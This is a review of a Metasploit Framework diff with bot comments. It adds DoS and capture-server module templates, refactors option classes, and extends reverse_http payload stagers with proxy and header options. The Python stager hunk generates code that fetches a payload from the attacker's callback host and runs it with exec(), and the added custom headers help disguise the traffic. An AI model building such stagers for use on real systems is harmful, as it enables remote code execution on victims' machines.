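Review bot: `log`, `report_host`, `report_service` and the `run` responses all share process stdout through `rpc_send`, so any plain `print()` in module code corrupts the JSON stream the Ruby bridge parses, and nothing documents that. A module-level docstring such as `"""RPC helpers for external modules: stdout is the RPC channel, never print() directly — use log()."""` states the contract where module authors will see it. `run` still reads the request with a single `os.read(0, 10000)` (unchanged context line), so a `run` request whose serialized datastore exceeds 10000 bytes is truncated and fails in `json.loads`; worth a follow-up now that the request carries every registered option.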
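Review bot: The new `else` branch in the `mod.meta['type']` dispatch returns an empty string, so a module with an unrecognised type silently renders as an empty source file, and the TODO confirms nothing is logged. At minimum `elog("Unsupported external module type #{mod.meta['type'].inspect} for #{mod.meta['name']}")` before the `''` gives the operator a trail to follow (`elog` is already used by the bridge in this diff). The enclosing method starts before the hunk.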
@@ -26,10 +33,6 @@ class Msf::Modules::External::Shim meta[:name] = mod.meta['name'].dump meta[:description] = mod.meta['description'].dump meta[:authors] = mod.meta['authors'].map(&:dump).join(",\n ") - meta[:date] = mod.meta['date'].dump - meta[:references] = mod.meta['references'].map do |r| - "[#{r['type'].upcase.dump}, #{r['ref'].dump}]" - end.join(",\n ") meta[:options] = mod.meta['options'].map do |n, o| "Opt#{o['type'].capitalize}.new(#{n.dump}, @@ -39,11 +42,15 @@ class Msf::Modules::External::Shim end def self.mod_meta_exploit(mod, meta = {}) + meta[:date] = mod.meta['date'].dump meta[:wfsdelay] = mod.meta['wfsdelay'] || 5 meta[:privileged] = mod.meta['privileged'].inspect meta[:platform] = mod.meta['targets'].map do |t| t['platform'].dump end.uniq.join(",\n ") + meta[:references] = mod.meta['references'].map do |r| + "[#{r['type'].upcase.dump}, #{r['ref'].dump}]" + end.join(",\n ") meta[:targets] = mod.meta['targets'].map do |t| "[#{t['platform'].dump} + ' ' + #{t['arch'].dump}, {'Arch' => ARCH_#{t['arch'].upcase}, 'Platform' => #{t['platform'].dump} }]" end.join(",\n ") @@ -56,4 +63,19 @@ class Msf::Modules::External::Shim meta[:command_stager_flavor] = mod.meta['payload']['command_stager_flavor'].dump render_template('remote_exploit_cmd_stager.erb', meta) end + + def self.capture_server(mod) + meta = mod_meta_common(mod) + render_template('capture_server.erb', meta) + end + + def self.dos(mod) + meta = mod_meta_common(mod) + meta[:date] = mod.meta['date'].dump + meta[:references] = mod.meta['references'].map do |r| + "[#{r['type'].upcase.dump}, #{r['ref'].dump}]" + end.join(",\n ") + + render_template('dos.erb', meta) + end end diff --git a/lib/msf/core/modules/external/templates/capture_server.erb b/lib/msf/core/modules/external/templates/capture_server.erb new file mode 100644 index 0000000000..853350fa67 --- /dev/null +++ b/lib/msf/core/modules/external/templates/capture_server.erb 
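Review bot: The date/references rendering removed from `mod_meta_common` is pasted verbatim into both `mod_meta_exploit` and the new `dos`, so the two copies will drift; a small shared helper called from both keeps one definition. Each copy also calls `mod.meta['date'].dump` and `mod.meta['references'].map` unguarded, so a module whose metadata omits either key fails with `NoMethodError` on nil from inside template generation rather than a message naming the missing field; `Array(mod.meta['references'])` tolerates a missing list. The join indentation string below is copied from the hunk as shown.

```ruby
  # Render the disclosure date and references shared by the exploit and dos templates.
  def self.mod_meta_references(mod, meta)
    meta[:date] = mod.meta['date'].dump
    meta[:references] = Array(mod.meta['references']).map do |r|
      "[#{r['type'].upcase.dump}, #{r['ref'].dump}]"
    end.join(",\n ")
    meta
  end
  # … unchanged: mod_meta_exploit / dos call mod_meta_references(mod, meta) in place of the inline copies …
```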
@@ -0,0 +1,26 @@ +require 'msf/core/modules/external/bridge' +require 'msf/core/module/external' + +class MetasploitModule < Msf::Auxiliary + include Msf::Module::External + + def initialize + super({ + <%= common_metadata meta %> + 'Actions' => [ ['Capture'] ], + 'PassiveActions' => ['Capture'], + 'DefaultAction' => 'Capture' + }) + + register_options([ + <%= meta[:options] %> + ]) + end + + def run + print_status("Starting server...") + mod = Msf::Modules::External::Bridge.open(<%= meta[:path] %>) + mod.run(datastore) + wait_status(mod) + end +end diff --git a/lib/msf/core/modules/external/templates/dos.erb b/lib/msf/core/modules/external/templates/dos.erb new file mode 100644 index 0000000000..cbf7c571ea --- /dev/null +++ b/lib/msf/core/modules/external/templates/dos.erb @@ -0,0 +1,29 @@ +require 'msf/core/modules/external/bridge' +require 'msf/core/module/external' + +class MetasploitModule < Msf::Auxiliary + include Msf::Module::External + include Msf::Auxiliary::Dos + + def initialize + super({ + <%= common_metadata meta %> + 'References' => + [ + <%= meta[:references] %> + ], + 'DisclosureDate' => <%= meta[:date] %>, + }) + + register_options([ + <%= meta[:options] %> + ]) + end + + def run + print_status("Starting server...") + mod = Msf::Modules::External::Bridge.open(<%= meta[:path] %>) + mod.run(datastore) + wait_status(mod) + end +end diff --git a/lib/msf/core/opt.rb b/lib/msf/core/opt.rb index 2d0a719fd2..33e1beed32 100644 --- a/lib/msf/core/opt.rb +++ b/lib/msf/core/opt.rb @@ -1,7 +1,6 @@ # -*- coding: binary -*- module Msf - # # Builtin framework options with shortcut methods # 
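Review bot: `dos.erb` copies `print_status("Starting server...")` from `capture_server.erb`, which is misleading for a DoS module that connects out rather than listens; `print_status("Running external module...")` reads correctly in both templates. Both templates also hand the entire `datastore` to the external process via `mod.run(datastore)`, which includes every registered option (proxy credentials and the like), not only the module's declared ones; if the bridge does not filter, passing just the keys from `meta[:options]` would be tighter (cannot confirm the bridge side from here).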
@@ -51,22 +50,62 @@ module Msf Msf::OptPort.new(__method__.to_s, [ required, desc, default ]) end - # @return [OptEnum] - def self.SSLVersion - Msf::OptEnum.new('SSLVersion', [ false, - 'Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate)', 'Auto', - ['Auto', 'SSL2', 'SSL3', 'SSL23', 'TLS', 'TLS1', 'TLS1.1', 'TLS1.2']]) + def self.ssl_supported_options + @m ||= ['Auto', 'TLS'] + OpenSSL::SSL::SSLContext::METHODS \ + .select{|m| !m.to_s.include?('client') && !m.to_s.include?('server')} \ + .select{|m| OpenSSL::SSL::SSLContext.new(m) && true rescue false} \ + .map{|m| m.to_s.sub(/v/, '').sub('_', '.')} end - # These are unused but remain for historical reasons - class << self - alias builtin_chost CHOST - alias builtin_cport CPORT - alias builtin_lhost LHOST - alias builtin_lport LPORT - alias builtin_proxies Proxies - alias builtin_rhost RHOST - alias builtin_rport RPORT + # @return [OptEnum] + def self.SSLVersion + Msf::OptEnum.new('SSLVersion', + 'Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate)', + enums: self.ssl_supported_options + ) + end + + def self.stager_retry_options + [ + OptInt.new('StagerRetryCount', + 'The number of times the stager should retry if the first connect fails', + default: 10, + aliases: ['ReverseConnectRetries'] + ), + OptInt.new('StagerRetryWait', + 'Number of seconds to wait for the stager between reconnect attempts', + default: 5 + ) + ] + end + + def self.http_proxy_options + [ + OptString.new('HttpProxyHost', 'An optional proxy server IP address or hostname', + aliases: ['PayloadProxyHost'] + ), + OptPort.new('HttpProxyPort', 'An optional proxy server port', + aliases: ['PayloadProxyPort'] + ), + OptString.new('HttpProxyUser', 'An optional proxy server username', + aliases: ['PayloadProxyUser'] + ), + OptString.new('HttpProxyPass', 'An optional proxy server password', + aliases: ['PayloadProxyPass'] + ), + OptEnum.new('HttpProxyType', 'The type of HTTP proxy', + enums: 
['HTTP', 'SOCKS'], + aliases: ['PayloadProxyType'] + ) + ] + end + + def self.http_header_options + [ + OptString.new('HttpHostHeader', 'An optional value to use for the Host HTTP header'), + OptString.new('HttpCookie', 'An optional value to use for the Cookie HTTP header'), + OptString.new('HttpReferer', 'An optional value to use for the Referer HTTP header') + ] end CHOST = CHOST() @@ -78,5 +117,4 @@ module Msf RPORT = RPORT() SSLVersion = SSLVersion() end - end diff --git a/lib/msf/core/opt_base.rb b/lib/msf/core/opt_base.rb index 348a0eca33..3b8c389ce7 100644 --- a/lib/msf/core/opt_base.rb +++ b/lib/msf/core/opt_base.rb @@ -22,15 +22,39 @@ module Msf # attrs[3] = possible enum values # attrs[4] = Regex to validate the option # - def initialize(in_name, attrs = [], aliases: []) + # Attrs can also be specified explicitly via named parameters, or attrs can + # also be a string as standin for the required description field. + # + def initialize(in_name, attrs = [], + required: false, desc: nil, default: nil, enums: [], regex: nil, aliases: []) self.name = in_name self.advanced = false self.evasion = false - self.required = attrs[0] || false - self.desc = attrs[1] - self.default = attrs[2] - self.enums = [ *(attrs[3]) ].map { |x| x.to_s } - regex_temp = attrs[4] || nil + self.aliases = aliases + + if attrs.is_a?(String) || attrs.length == 0 + self.required = required + self.desc = attrs.is_a?(String) ? attrs : desc + self.enums = [ *(enums) ].map { |x| x.to_s } + if default.nil? && enums.length > 0 + self.default = enums[0] + else + self.default = default + end + regex_temp = regex + else + if attrs[0].nil? + self.required = required + else + self.required = attrs[0] + end + self.desc = attrs[1] || desc + self.default = attrs[2] || default + self.enums = attrs[3] || enums + self.enums = [ *(self.enums) ].map { |x| x.to_s } + regex_temp = attrs[4] || regex + end + if regex_temp # convert to string regex_temp = regex_temp.to_s if regex_temp.is_a? Regexp 
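Review bot: `ssl_supported_options` memoizes into `@m`, a name that says nothing at module scope; `@ssl_supported_options ||=` is self-describing. The derived list offers whatever `OpenSSL::SSL::SSLContext::METHODS` the runtime can instantiate, so on an OpenSSL build that still carries them `SSL2` and `SSL3` are presented as valid choices, while the description still advertises `SSL23`, which is only present when that method exists — consider dropping the legacy SSLv2/SSLv3 entries from the enum and updating the description to match what the list actually contains. The inline `rescue false` modifier swallows every error from `SSLContext.new`, not just the unsupported-method case; `rescue ArgumentError` (presumably what an unknown method raises — confirm) would be tighter.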
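Review bot: In the positional branch, `self.default = attrs[2] || default` discards an explicit `false` third element, so for option types whose named `default` is nil, `[true, 'desc', false]` ends up with a nil default; `self.default = attrs[2].nil? ? default : attrs[2]` preserves it, and the same nil-test form would suit `attrs[0]` (already done) and `attrs[4]`. `attrs.is_a?(String) || attrs.length == 0` raises `NoMethodError` if a caller passes `attrs` as nil explicitly; `attrs.nil? || attrs.is_a?(String) || attrs.empty?` covers that. `initialize` continues past the hunk with the regex handling.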
@@ -45,35 +69,34 @@ module Msf raise("Invalid Regex #{regex_temp}: #{e}") end end - self.aliases = aliases end # # Returns true if this is a required option. # def required? - return required + required end # # Returns true if this is an advanced option. # def advanced? - return advanced + advanced end # # Returns true if this is an evasion option. # def evasion? - return evasion + evasion end # # Returns true if the supplied type is equivalent to this option's type. # def type?(in_type) - return (type == in_type) + type == in_type end # @@ -94,7 +117,7 @@ module Msf if regex return !!value.match(regex) end - return true + true end # @@ -102,7 +125,7 @@ module Msf # a valid value # def empty_required_value?(value) - return (required? and value.nil?) + required? && value.nil? end # @@ -169,6 +192,4 @@ module Msf attr_writer :required, :desc, :default # :nodoc: end - end - diff --git a/lib/msf/core/opt_bool.rb b/lib/msf/core/opt_bool.rb index a003817f21..cdee151f2e 100644 --- a/lib/msf/core/opt_bool.rb +++ b/lib/msf/core/opt_bool.rb 
@@ -1,48 +1,33 @@ # -*- coding: binary -*- module Msf + # Boolean option type + class OptBool < OptBase + TRUE_REGEX = /^(y|yes|t|1|true)$/i + ANY_REGEX = /^(y|yes|n|no|t|f|0|1|true|false)$/i -### -# -# Boolean option. -# -### -class OptBool < OptBase - - TrueRegex = /^(y|yes|t|1|true)$/i - - def type - return 'bool' - end - - def valid?(value, check_empty: true) - return false if empty_required_value?(value) - - if ((value != nil and - (value.to_s.empty? == false) and - (value.to_s.match(/^(y|yes|n|no|t|f|0|1|true|false)$/i) == nil))) - return false + # This overrides default from 'nil' to 'false' + def initialize(in_name, attrs = [], + required: true, desc: nil, default: false, aliases: []) + super end - true - end + def type + return 'bool' + end - def normalize(value) - if(value.nil? or value.to_s.match(TrueRegex).nil?) - false - else - true + def valid?(value, check_empty: true) + return false if check_empty && empty_required_value?(value) + return true if value.nil? && !required? + + !(value.nil? || + value.to_s.empty? || + value.to_s.match(ANY_REGEX).nil?) + end + + def normalize(value) + !(value.nil? || + value.to_s.match(TRUE_REGEX).nil?) end end - - def is_true?(value) - return normalize(value) - end - - def is_false?(value) - return !is_true?(value) - end - -end - end diff --git a/lib/msf/core/opt_enum.rb b/lib/msf/core/opt_enum.rb index 168c74b3dc..4f830ee411 100644 --- a/lib/msf/core/opt_enum.rb +++ b/lib/msf/core/opt_enum.rb 
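Review bot: `TRUE_REGEX` and `ANY_REGEX` anchor with `^`/`$`, which in Ruby match at line boundaries, so a value such as `"true\nanything"` passes `valid?` and `normalize` returns true for it; `TRUE_REGEX = /\A(y|yes|t|1|true)\z/i` and `ANY_REGEX = /\A(y|yes|n|no|t|f|0|1|true|false)\z/i` anchor the whole string. The hunk also removes the public `is_true?`/`is_false?` methods and renames the `TrueRegex` constant; callers outside this file (not visible here) would break, so either keep them as thin aliases or note the removal in the commit description.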
@@ -1,48 +1,49 @@ # -*- coding: binary -*- module Msf - -### -# -# Enum option. -# -### -class OptEnum < OptBase - - def type - return 'enum' - end - - def valid?(value=self.value, check_empty: true) - return false if check_empty && empty_required_value?(value) - return true if value.nil? and !required? - - (value and self.enums.include?(value.to_s)) - end - - def normalize(value=self.value) - return nil if not self.valid?(value) - return value.to_s - end - - def desc=(value) - self.desc_string = value - - self.desc - end - - def desc - if self.enums - str = self.enums.join(', ') + ### + # + # Enum option. + # + ### + class OptEnum < OptBase + def type + return 'enum' end - "#{self.desc_string || ''} (Accepted: #{str})" + + # This overrides required default from 'false' to 'true' + def initialize(in_name, attrs = [], + required: true, desc: nil, default: nil, enums: [], aliases: []) + super + end + + def valid?(value = self.value, check_empty: true) + return false if check_empty && empty_required_value?(value) + return true if value.nil? && !required? + + !value.nil? && enums.include?(value.to_s) + end + + def normalize(value = self.value) + if valid?(value) + value.to_s + else + nil + end + end + + def desc=(value) + self.desc_string = value + desc + end + + def desc + str = enums.join(', ') if enums + "#{desc_string || ''} (Accepted: #{str})" + end + + protected + + attr_accessor :desc_string # :nodoc: end - - -protected - - attr_accessor :desc_string # :nodoc: - -end - end diff --git a/lib/msf/core/payload/android/reverse_http.rb b/lib/msf/core/payload/android/reverse_http.rb index 3bec538d74..cd398c15b6 100644 --- a/lib/msf/core/payload/android/reverse_http.rb +++ b/lib/msf/core/payload/android/reverse_http.rb 
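Review bot: `normalize` spells out an `if valid?(value) … else nil end`, where the idiomatic form is `value.to_s if valid?(value)`; likewise `desc` can drop the `if enums` guard since `OptBase#initialize` in this change always assigns an array (`[ *(enums) ].map`). The new `initialize` signature omits the `regex:` keyword that `OptBase#initialize` accepts, so an `OptEnum.new(..., regex: …)` call now raises `ArgumentError` — probably fine for an enum, but worth a comment saying it is deliberate. `desc=` storing into `desc_string` and `desc` appending the accepted list is non-obvious; `# desc is rendered with the accepted values appended, so the raw text lives in desc_string` would help.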
@@ -20,6 +20,14 @@ module Payload::Android::ReverseHttp include Msf::Payload::Android::PayloadOptions include Msf::Payload::UUID::Options + # + # Register reverse_http specific options + # + def initialize(*args) + super + register_advanced_options(Msf::Opt::http_header_options) + end + # # Generate the transport-specific configuration # diff --git a/lib/msf/core/payload/java/reverse_http.rb b/lib/msf/core/payload/java/reverse_http.rb index 1aff5eab2a..a454191032 100644 --- a/lib/msf/core/payload/java/reverse_http.rb +++ b/lib/msf/core/payload/java/reverse_http.rb @@ -23,10 +23,13 @@ module Payload::Java::ReverseHttp # def initialize(*args) super - register_advanced_options([ - Msf::OptInt.new('Spawn', [true, 'Number of subprocesses to spawn', 2]), - Msf::OptInt.new('StagerURILength', [false, 'The URI length for the stager (at least 5 bytes)']) - ]) + register_advanced_options( + [ + OptInt.new('Spawn', [true, 'Number of subprocesses to spawn', 2]), + OptInt.new('StagerURILength', [false, 'The URI length for the stager (at least 5 bytes)']), + ] + + Msf::Opt::http_header_options + ) end # @@ -64,6 +67,10 @@ module Payload::Java::ReverseHttp c = '' c << "Spawn=#{ds["Spawn"] || 2}\n" + c << "HeaderUser-Agent=#{ds["HttpUserAgent"]}\n" if ds["HttpUserAgent"] + c << "HeaderHost=#{ds["HttpHostHeader"]}\n" if ds["HttpHostHeader"] + c << "HeaderReferer=#{ds["HttpReferer"]}\n" if ds["HttpReferer"] + c << "HeaderCookie=#{ds["HttpCookie"]}\n" if ds["HttpCookie"] c << "URL=#{scheme}://#{ds['LHOST']}" c << ":#{ds['LPORT']}" if ds['LPORT'] c << luri diff --git a/lib/msf/core/payload/multi/reverse_http.rb b/lib/msf/core/payload/multi/reverse_http.rb index 008f99f5a0..1acb8f94e1 100644 --- a/lib/msf/core/payload/multi/reverse_http.rb +++ b/lib/msf/core/payload/multi/reverse_http.rb 
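Review bot: In the Java config hunk, the four header values are interpolated into a newline-delimited `key=value` block with no escaping, so a datastore value containing `\n` (a `HttpCookie`, say) injects additional config lines; these are operator-supplied, but either a `regex: /\A[^\r\n]*\z/` on the options in `http_header_options` or a `.gsub(/[\r\n]/, '')` at this site closes that off. `ds["HttpUserAgent"]` is read here although `http_header_options` only registers Host, Cookie and Referer, so the value depends on the handler registering `HttpUserAgent` (it does in the reverse_http hunk earlier; other transports are not visible). A comment such as `# one header per line; values must not contain CR/LF` next to the `c <<` lines documents the format the stager parses.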
@@ -22,16 +22,12 @@ module Payload::Multi::ReverseHttp # def initialize(*args) super - register_advanced_options([ - OptInt.new('StagerURILength', [false, 'The URI length for the stager (at least 5 bytes)']), - OptInt.new('StagerRetryCount', [false, 'The number of times the stager should retry if the first connect fails', 10], - aliases: ['ReverseConnectRetries']), - OptString.new('PayloadProxyHost', [false, 'An optional proxy server IP address or hostname']), - OptPort.new('PayloadProxyPort', [false, 'An optional proxy server port']), - OptString.new('PayloadProxyUser', [false, 'An optional proxy server username']), - OptString.new('PayloadProxyPass', [false, 'An optional proxy server password']), - OptEnum.new('PayloadProxyType', [false, 'The type of HTTP proxy (HTTP or SOCKS)', 'HTTP', ['HTTP', 'SOCKS']]) - ]) + register_advanced_options( + [ OptInt.new('StagerURILength', 'The URI length for the stager (at least 5 bytes)') ] + + Msf::Opt::stager_retry_options + + Msf::Opt::http_header_options + + Msf::Opt::http_proxy_options + ) end # @@ -67,4 +63,3 @@ module Payload::Multi::ReverseHttp end end - diff --git a/lib/msf/core/payload/python/meterpreter_loader.rb b/lib/msf/core/payload/python/meterpreter_loader.rb index 95f2335763..5bb0143857 100644 --- a/lib/msf/core/payload/python/meterpreter_loader.rb +++ b/lib/msf/core/payload/python/meterpreter_loader.rb 
@@ -28,10 +28,20 @@ module Payload::Python::MeterpreterLoader 'Stager' => {'Payload' => ""} )) - register_advanced_options([ - OptBool.new('MeterpreterTryToFork', [ true, 'Fork a new process if the functionality is available', true ]), - OptBool.new('PythonMeterpreterDebug', [ true, 'Enable debugging for the Python meterpreter', false ]) - ], self.class) + register_advanced_options( + [ + OptBool.new( + 'MeterpreterTryToFork', + 'Fork a new process if the functionality is available', + default: true + ), + OptBool.new( + 'PythonMeterpreterDebug', + 'Enable debugging for the Python meterpreter' + ), + ] + + Msf::Opt::http_header_options + ) end def stage_payload(opts={}) 
@@ -85,17 +95,40 @@ module Payload::Python::MeterpreterLoader end met.sub!("SESSION_GUID = \'\'", "SESSION_GUID = \'#{session_guid}\'") - http_user_agent = opts[:http_user_agent] || ds['MeterpreterUserAgent'] - http_proxy_host = opts[:http_proxy_host] || ds['PayloadProxyHost'] || ds['PROXYHOST'] - http_proxy_port = opts[:http_proxy_port] || ds['PayloadProxyPort'] || ds['PROXYPORT'] + http_user_agent = opts[:http_user_agent] || ds['HttpUserAgent'] + http_proxy_host = opts[:http_proxy_host] || ds['HttpProxyHost'] || ds['PROXYHOST'] + http_proxy_port = opts[:http_proxy_port] || ds['HttpProxyPort'] || ds['PROXYPORT'] + http_header_host = opts[:header_host] || ds['HttpHostHeader'] + http_header_cookie = opts[:header_cookie] || ds['HttpCookie'] + http_header_referer = opts[:header_referer] || ds['HttpReferer'] - # patch in the stageless http(s) connection url - met.sub!('HTTP_CONNECTION_URL = None', "HTTP_CONNECTION_URL = '#{var_escape.call(opts[:url])}'") if opts[:url].to_s != '' - met.sub!('HTTP_USER_AGENT = None', "HTTP_USER_AGENT = '#{var_escape.call(http_user_agent)}'") if http_user_agent.to_s != '' + # The callback URL can be different to the one that we're receiving from the interface + # so we need to generate it + # TODO: move this to somewhere more common so that it can be used across payload types + unless opts[:url].to_s == '' + uri = "/#{opts[:url].split('/').reject(&:empty?)[-1]}" + callback_url = [ + opts[:url].to_s.split(':')[0], + '://', + (ds['OverrideRequestHost'] == true ? ds['OverrideRequestLHOST'] : ds['LHOST']).to_s, + ':', + (ds['OverrideRequestHost'] == true ? 
ds['OverrideRequestLPORT'] : ds['LPORT']).to_s, + ds['LURI'].to_s, + uri, + '/' + ].join('') - if http_proxy_host.to_s != '' - proxy_url = "http://#{http_proxy_host}:#{http_proxy_port}" - met.sub!('HTTP_PROXY = None', "HTTP_PROXY = '#{var_escape.call(proxy_url)}'") + # patch in the various payload related configuration + met.sub!('HTTP_CONNECTION_URL = None', "HTTP_CONNECTION_URL = '#{var_escape.call(callback_url)}'") + met.sub!('HTTP_USER_AGENT = None', "HTTP_USER_AGENT = '#{var_escape.call(http_user_agent)}'") if http_user_agent.to_s != '' + met.sub!('HTTP_COOKIE = None', "HTTP_COOKIE = '#{var_escape.call(http_header_cookie)}'") if http_header_cookie.to_s != '' + met.sub!('HTTP_HOST = None', "HTTP_HOST = '#{var_escape.call(http_header_host)}'") if http_header_host.to_s != '' + met.sub!('HTTP_REFERER = None', "HTTP_REFERER = '#{var_escape.call(http_header_referer)}'") if http_header_referer.to_s != '' + + if http_proxy_host.to_s != '' + proxy_url = "http://#{http_proxy_host}:#{http_proxy_port}" + met.sub!('HTTP_PROXY = None', "HTTP_PROXY = '#{var_escape.call(proxy_url)}'") + end end # patch in any optional stageless tcp socket setup diff --git a/lib/msf/core/payload/python/reverse_http.rb b/lib/msf/core/payload/python/reverse_http.rb index 361ecb3c8e..f0981c9796 100644 --- a/lib/msf/core/payload/python/reverse_http.rb +++ b/lib/msf/core/payload/python/reverse_http.rb @@ -11,11 +11,10 @@ module Payload::Python::ReverseHttp def initialize(info = {}) super(info) - register_options( - [ - OptString.new('PayloadProxyHost', [ false, "The proxy server's IP address" ]), - OptPort.new('PayloadProxyPort', [ true, "The proxy port to connect to", 8080 ]) - ], self.class) + register_advanced_options( + Msf::Opt::http_header_options + + Msf::Opt::http_proxy_options + ) end # 
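Review bot: The proxy patching in the `@@ -85,17 +95,40 @@` hunk is now nested inside `unless opts[:url].to_s == ''`, whereas the removed code patched `HTTP_PROXY` regardless of whether a URL was supplied, so a configured HttpProxyHost is silently dropped when opts[:url] is empty; if that is intended, a comment explaining why a proxy only applies together with a URL would help, otherwise the `if http_proxy_host.to_s != ''` block should move back out one level. `uri` is taken as the last non-empty segment of opts[:url], so a URL with no path component (`http://host:port/`) would yield the authority as the segment; if such input can reach this method, the result of the split needs a guard. The repeated `ds['OverrideRequestHost'] == true ? ... : ...` ternaries for host and port could be two locals computed once, and `== true` is an explicit boolean comparison the style guide discourages. stage_payload begins and ends outside this hunk.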
@@ -24,11 +23,14 @@ module Payload::Python::ReverseHttp def generate(opts={}) ds = opts[:datastore] || datastore opts.merge!({ - host: ds['LHOST'] || '127.127.127.127', - port: ds['LPORT'], - proxy_host: ds['PayloadProxyHost'], - proxy_port: ds['PayloadProxyPort'], - user_agent: ds['MeterpreterUserAgent'] + host: ds['LHOST'] || '127.127.127.127', + port: ds['LPORT'], + proxy_host: ds['HttpProxyHost'], + proxy_port: ds['HttpProxyPort'], + user_agent: ds['HttpUserAgent'], + header_host: ds['HttpHostHeader'], + header_cookie: ds['HttpCookie'], + header_referer: ds['HttpReferer'] }) opts[:scheme] = 'http' if opts[:scheme].nil? @@ -104,9 +106,18 @@ module Payload::Python::ReverseHttp cmd << "hs.append(ul.ProxyHandler({'#{opts[:scheme]}':'#{var_escape.call(proxy_url)}'}))\n" end + headers = [] + headers << "('User-Agent','#{var_escape.call(opts[:user_agent])}')" + headers << "('Cookie','#{var_escape.call(opts[:header_cookie])}')" if opts[:header_cookie] + headers << "('Referer','#{var_escape.call(opts[:header_referer])}')" if opts[:header_referer] + cmd << "o=ul.build_opener(*hs)\n" - cmd << "o.addheaders=[('User-Agent','#{var_escape.call(opts[:user_agent])}')]\n" - cmd << "exec(o.open('#{generate_callback_url(opts)}').read())\n" + cmd << "o.addheaders=[#{headers.join(',')}]\n" + if opts[:header_host] + cmd << "exec(o.open(ul.Request('#{generate_callback_url(opts)}',None,{'Host':'#{var_escape.call(opts[:header_host])}'})).read())\n" + else + cmd << "exec(o.open('#{generate_callback_url(opts)}').read())\n" + end py_create_exec_stub(cmd) end diff --git a/lib/msf/core/payload/python/reverse_tcp.rb b/lib/msf/core/payload/python/reverse_tcp.rb index 8369602654..77481ecbb3 100644 --- a/lib/msf/core/payload/python/reverse_tcp.rb +++ b/lib/msf/core/payload/python/reverse_tcp.rb 
@@ -18,11 +18,7 @@ module Payload::Python::ReverseTcp def initialize(*args) super - register_advanced_options([ - OptInt.new('StagerRetryCount', [false, 'The number of times the stager should retry if the first connect fails', 10], - aliases: ['ReverseConnectRetries']), - OptInt.new('StagerRetryWait', [false, 'Number of seconds to wait for the stager between reconnect attempts', 5]) - ], self.class) + register_advanced_options(Msf::Opt::stager_retry_options) end # diff --git a/lib/msf/core/payload/python/reverse_tcp_ssl.rb b/lib/msf/core/payload/python/reverse_tcp_ssl.rb index ee65afe0ab..b1fcecdde7 100644 --- a/lib/msf/core/payload/python/reverse_tcp_ssl.rb +++ b/lib/msf/core/payload/python/reverse_tcp_ssl.rb @@ -17,11 +17,7 @@ module Payload::Python::ReverseTcpSsl include Msf::Payload::Python::ReverseTcp def initialize(*args) super - register_advanced_options([ - OptInt.new('StagerRetryCount', [false, 'The number of times the stager should retry if the first connect fails', 10], - aliases: ['ReverseConnectRetries']), - OptInt.new('StagerRetryWait', [false, 'Number of seconds to wait for the stager between reconnect attempts', 5]) - ], self.class) + register_advanced_options(Msf::Opt::stager_retry_options) end # diff --git a/lib/msf/core/payload/transport_config.rb b/lib/msf/core/payload/transport_config.rb index c59c85577e..84e257bcce 100644 --- a/lib/msf/core/payload/transport_config.rb +++ b/lib/msf/core/payload/transport_config.rb 
@@ -56,16 +56,20 @@ module Msf::Payload::TransportConfig ds = opts[:datastore] || datastore { - scheme: ds['OverrideScheme'] || 'http', - lhost: opts[:lhost] || ds['LHOST'], - lport: (opts[:lport] || ds['LPORT']).to_i, - uri: uri, - ua: ds['MeterpreterUserAgent'], - proxy_host: ds['PayloadProxyHost'], - proxy_port: ds['PayloadProxyPort'], - proxy_type: ds['PayloadProxyType'], - proxy_user: ds['PayloadProxyUser'], - proxy_pass: ds['PayloadProxyPass'] + scheme: ds['OverrideScheme'] || 'http', + lhost: opts[:lhost] || ds['LHOST'], + lport: (opts[:lport] || ds['LPORT']).to_i, + uri: uri, + ua: ds['HttpUserAgent'], + proxy_host: ds['HttpProxyHost'], + proxy_port: ds['HttpProxyPort'], + proxy_type: ds['HttpProxyType'], + proxy_user: ds['HttpProxyUser'], + proxy_pass: ds['HttpProxyPass'], + host: ds['HttpHostHeader'], + cookie: ds['HttpCookie'], + referer: ds['HttpReferer'], + custom_headers: get_custom_headers(ds) }.merge(timeout_config(opts)) end @@ -80,6 +84,19 @@ module Msf::Payload::TransportConfig private + def get_custom_headers(ds) + headers = "" + headers << "Host: #{ds['HttpHostHeader']}\r\n" if ds['HttpHostHeader'] + headers << "Cookie: #{ds['HttpCookie']}\r\n" if ds['HttpCookie'] + headers << "Referer: #{ds['HttpReferer']}\r\n" if ds['HttpReferer'] + + if headers.length > 0 + headers + else + nil + end + end + def timeout_config(opts={}) ds = opts[:datastore] || datastore { diff --git a/lib/msf/core/payload/uuid.rb b/lib/msf/core/payload/uuid.rb index acc100406a..f510c88469 100644 --- a/lib/msf/core/payload/uuid.rb +++ b/lib/msf/core/payload/uuid.rb @@ -43,7 +43,8 @@ class Msf::Payload::UUID 24 => ARCH_AARCH64, 25 => ARCH_MIPS64, 26 => ARCH_PPC64LE, - 27 => ARCH_R + 27 => ARCH_R, + 28 => ARCH_PPCE500V2 } Platforms = { @@ -253,6 +254,10 @@ class Msf::Payload::UUID self.xor1 = opts[:xor1] self.xor2 = opts[:xor2] + self.timestamp = nil + self.name = nil + self.registered = false + if opts[:seed] self.puid = self.class.seed_to_puid(opts[:seed]) end 
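Review bot: `get_custom_headers` in the `@@ -80,6 +84,19 @@` hunk is the same helper, line for line, that the commit also adds to lib/msf/core/payload/windows/reverse_http.rb and lib/msf/core/payload/windows/x64/reverse_http.rb, so the three copies will drift; if those modules mix in Msf::Payload::TransportConfig (the `transport_config` method in the x64 module suggests they may), the private copy here could be the single shared one. The trailing `if headers.length > 0 headers else nil end` reads more directly as `headers.empty? ? nil : headers`. The datastore values are concatenated into the header block verbatim with `\r\n` terminators, so a value that itself contains CR or LF would end the block early or split it into extra headers; a short doc comment such as `# Build the raw CRLF-terminated Host/Cookie/Referer header block from the datastore, or nil when none are set; values are used as-is` would make that contract explicit for callers.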
